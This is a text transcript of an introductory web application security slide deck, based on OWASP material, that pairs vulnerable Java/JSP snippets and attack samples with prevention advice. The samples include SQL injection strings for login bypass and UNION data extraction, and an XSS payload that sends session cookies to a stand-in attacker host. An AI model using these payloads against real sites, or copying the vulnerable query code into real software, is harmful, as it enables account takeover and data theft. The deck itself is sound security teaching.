web application security in a nutshell
DESCRIPTION
>>> View this presentation online at http://webappsec-nutshell.kimminich.de/TRANSCRIPT
![Page 1: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/1.jpg)
WEB APPLICATIONSECURITY
IN A NUTSHELLAN ULTRA-COMPACT INTRO (OR REFRESHER) TO WEB APPLICATION SECURITY
Created by / Björn Kimminich @bkimminich
![Page 2: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/2.jpg)
BJÖRN KIMMINICHApplication Security Officer at Author of open-source pentest training webapp
member and contributor
Kuehne + Nagel (AG & Co.) KGjuice-shop
OWASP OWASP Zed Attack Proxy
![Page 3: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/3.jpg)
FAMOUS LAST WORDS...“Nobody would bother to hack us.”
“Our Firewall, IDS and IPS will keep us safe.”
“We will add security to the system later.”
“What's the worst that could actually happen?”
![Page 4: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/4.jpg)
INJECTION
![Page 5: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/5.jpg)
INJECTION MEANS......tricking an application into including unintended commands in
the data sent to an interpreter.
![Page 6: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/6.jpg)
INTERPRETER MEANS......a program that takes a String and interprets it as a command.
![Page 7: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/7.jpg)
INTERPRETERS ARE USED FOR...SQLHQLOS ShellLDAPXPath...
![Page 8: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/8.jpg)
BYPASSING AUTHENTICATIONWITH SQL INJECTION
String query = "SELECT id FROM users " + "WHERE name = '" + req.getParameter("username") + "'" + "AND password = '" + req.getParameter("password") + "'";
The indented use case results in a query like this:SELECT id FROM users WHERE name = 'bjoern' AND password = 'secret'
![Page 9: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/9.jpg)
ATTACK EXAMPLESON AUTHENTICATION QUERIES
Disabling password check for a known username:SELECT id FROM users WHERE name = 'bjoern'‐‐' AND password = '?'
Logging in without even knowing a username:SELECT id FROM users WHERE name = '' or 1=1‐‐' AND password = '?'
![Page 10: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/10.jpg)
SPYING OUT DATAWITH SQL INJECTION
String query = "SELECT id,author,title,price FROM books " + "WHERE title LIKE '%" + req.getParameter("query") + "%'";
The indented use case results in a query like this:SELECT id,author,title,price FROM books WHERE title LIKE '%tangled web%'
![Page 11: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/11.jpg)
ATTACK EXAMPLESON DATA RETRIEVAL QUERIES
Probing for right number of result set columns:SELECT [...] WHERE title LIKE '%' UNION SELECT null FROM users‐‐%'
SELECT [...] WHERE title LIKE '%' UNION SELECT null,null FROM users‐‐%'
SELECT [...] WHERE title LIKE '%' UNION SELECT null,null,null FROM users‐‐%'
Using known column names to extract data:SELECT [...] WHERE title LIKE '%' UNION SELECT name,password,email FROM users‐‐%'
![Page 12: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/12.jpg)
PREVENTING INJECTIONAvoid InterpretersBind VariablesPrepared StatementsLeast Privileges for app DB userWhite List Input Validation
![Page 13: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/13.jpg)
CROSS SITE SCRIPTING (XSS)
![Page 14: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/14.jpg)
MALICIOUS CODE IS SENT......to an innocent user's browser through
a form field or URL (Reflected XSS)a previously stored DB record (Persistent XSS)a DOM element of a rich JS client (Local XSS)
![Page 15: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/15.jpg)
POSSIBLE DAMAGE FROM XSSstolen user sessionstolen sensitive datarewriting web pageredirecting to malicious site
![Page 16: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/16.jpg)
XSS VULNERABILITY EXAMPLEhttp://bookwo.rm/titles/search?keywords=raspberry%20pi
The indented use case is to display the keywords above theresults:
<%String keywords = request.getParameter("keywords");List<Book> results = titleSearchService.findByKeywords(keywords.split(" "));%>There are <%=results.count()%> results for your search by <em><%=keywords%></em><table> <% for (Book book : results) { %> // render result as table rows <% } %></table>
![Page 17: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/17.jpg)
XSS ATTACK EXAMPLESProbing for XSS Vulnerability
<script> </script>alert(1)
Stealing User Session<script>
</script> new Image().src="http://my.evil‐si.te/hijack.php?c="+encodeURI(document.cookie);
Site Defacement<script> </script>document.body.background="http://my.evil‐si.te/image.jpg";
![Page 18: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/18.jpg)
PREVENTING XSSDo not unnecessarily include user supplied input into outputOutput encode all user supplied inputSanitize HTML where user supplied HTML is unavoidableWhite List Input Validation
![Page 19: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/19.jpg)
CROSS SITE REQUEST FORGERY (CSRF)
![Page 20: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/20.jpg)
A VICTIM'S BROWSER......is tricked into issuing a command to a vulnerable webapp. This
is caused by browsers automatically including userauthentication data with each request.
Session CookieBasic AuthenticationAuthorization HTTP Header...
![Page 21: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/21.jpg)
CSRF ATTACK EXAMPLES
![Page 22: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/22.jpg)
PREVENTING CSRFAdd a secret token to all sensitive requestsThis token must not be automatically submittedRequire secondary authentication for sensitive functionsBeware exposing the token in a Referer HTTP header
Make sure your application has no XSS holes that could beexploited to attack others!
![Page 23: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/23.jpg)
BROKEN AUTHENTICATION
![Page 24: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/24.jpg)
TYPICAL AUTHENTICATION FLAWSAllowing weak passwordsStoring SSL certificate insecurelyCredentials passed via insecure http connectionExpose session id's in URLs, via unencrypted network, logs, ...
![Page 25: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/25.jpg)
SIDE CHANNEL ATTACK VECTORSChange Password“Remember me”Forgot PasswordSecret Questions
Make sure your application does not store credentials in itsdatabase unencrypted!
![Page 26: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/26.jpg)
CLASSICAL BROKEN AUTHENTICATION......DUE TO STARTING LOGIN PROCESS ON UNENCRYPTED PAGE
http://sick‐cure‐ba.nk/login.do
POST /login.do HTTP/1.1Host: sick‐cure‐ba.nkCache‐Control: no‐cacheContent‐Type: application/x‐www‐form‐urlencoded
username=bjoern&password=secret
![Page 27: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/27.jpg)
WEAK HASHES PUT PASSWORDS AT RISK......AS DO UNSALTED STRONG HASH ALGORITHMS
id username password1 admin d033e22ae348aeb5660fc2140aec35850c4da997
2 bjoern 2bb80d537b1da3e38bd30361aa855686bde0eacd7162fef6a25fe97bf527a25b
3 localhorst 0f59bd4122f0c02002ec578e4eec306ed48ff2ad0105a307a6dc98c0e9a54fe464e5f807236edce12134067a0b6690891e82490b2b9fa7b4171db43ee8cb4006
Cracking unsalted hashes with a attack is fast, even though the last two of them might seemsufficiently secure given their 256 and 512bit length. You can even crack password hashes online, e.g. at
or via .
Rainbow Table
CrackStation a tweet to @PlzCrack
![Page 28: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/28.jpg)
BROKEN ACCESS CONTROL
![Page 29: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/29.jpg)
COMMON AUTHORIZATION MISTAKESHiding object references instead of restricting accessDisplaying only authorized links and menu choicesTrusting client-side access control mechanismsLack of server-side verification of user privileges
![Page 30: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/30.jpg)
REQUEST TAMPERING FOR PRIVILEGE ESCALATION......AND FINDING ALL KINDS OF ACCESS CONTROL ISSUES
http://logistics‐worldwi.de/showShipment?id=40643108
http://my‐universi.ty/api/students/6503/exams/view
http://document‐warehou.se/landingpage?content=index.html
![Page 31: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/31.jpg)
SECURING AUTHORIZATIONNever rely on “Security by obscurity”Replace direct object references with temporary mappingsRestrict data and functionality access to authorized usersEnforce user or role based permissions
![Page 32: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/32.jpg)
BROKEN ENVIRONMENT
![Page 33: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/33.jpg)
POSSIBLE ENVIRONMENTAL VULNERABILITIESSoftware LibrariesApplication ServerWeb ServerOperating System...
![Page 34: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/34.jpg)
KNOWN VULNERABILITY EXAMPLESComponent Vulnerability AffectedOpenSSL Obtain sensitive information from process memory via crafted
packets that trigger a buffer over-read ( )1.0.1 - 1.0.1f, 1.0.2-beta, 1.0.2-beta1
Unix Bash Execution of arbitrary commands on vulnerable Bash, potentiallycompromising the entire system ( )
CGI, OpenSSH,DHCP, QMail, ...
Struts Remote manipulation of the ClassLoader via the classparameter, which is passed to the getClass() method
before 2.3.16.1
Struts Wildcard cookiesName not properly restricts access to thegetClass() method, which allows ClassLoader manipulation
before 2.3.16.2
Heartbleed
Shellshock
![Page 35: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/35.jpg)
PROTECTION FROM ENVIRONMENTAL VULNERABILITIESMonitor security of used componentsKeep up with patches for used componentsRemove unnecessary stuff on all levelsRestrict use of unapproved components
Java and .NET project dependencies can be monitored by which relies on the . For Javascript and Node.js modules there is which is updated manually
via . Both tools integrate well with typical software build processes.
OWASP Dependency Check NISTNational Vulnerability Database Retire.js
its GitHub project
![Page 36: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/36.jpg)
Q&A
![Page 37: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/37.jpg)
CREDITSPresentation created with reveal.js
The HTML Presentation Framework
Based on free material provided by OWASPThe Open Web Application Security Project
Background image based on by Digital Shodan sephiroth-kmfdm
![Page 38: Web Application Security in a nutshell](https://reader033.vdocuments.mx/reader033/viewer/2022052622/5592a17e1a28ab3b238b4720/html5/thumbnails/38.jpg)
THE ENDBY BJÖRN KIMMINICH / KIMMINICH.DE
These slides are publicly available on and .GitHub Slideshare